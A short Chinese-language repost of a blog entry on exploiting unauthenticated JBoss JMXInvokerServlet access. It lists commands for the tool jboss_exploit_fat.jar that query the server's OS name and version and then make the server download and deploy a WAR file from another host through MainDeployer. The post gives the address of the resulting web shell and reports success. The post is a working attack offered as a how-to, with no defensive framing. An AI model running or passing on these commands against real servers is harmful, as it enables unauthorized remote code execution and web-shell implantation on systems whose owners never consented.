當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Jboss未授权访问部署木马利用exp

發布時間：2025/3/15 编程问答 35 豆豆

生活随笔收集整理的這篇文章主要介紹了 Jboss未授权访问部署木马利用exp 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

查看系統名稱

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

查看系統版本

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion

3.遠程部署war

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war

獲得shell地址:
www.any.com:8080/no/index.jsp

成功！

轉載于:https://www.cnblogs.com/n00p/p/8951922.html

總結

以上是生活随笔為你收集整理的Jboss未授权访问部署木马利用exp的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： 3.使用Selenium模拟浏览器抓取淘
下一篇：虚拟环境安装Scrapy框架

编程问答

Jboss未授权访问部署木马 利用exp

總結

Jboss未授权访问部署木马利用exp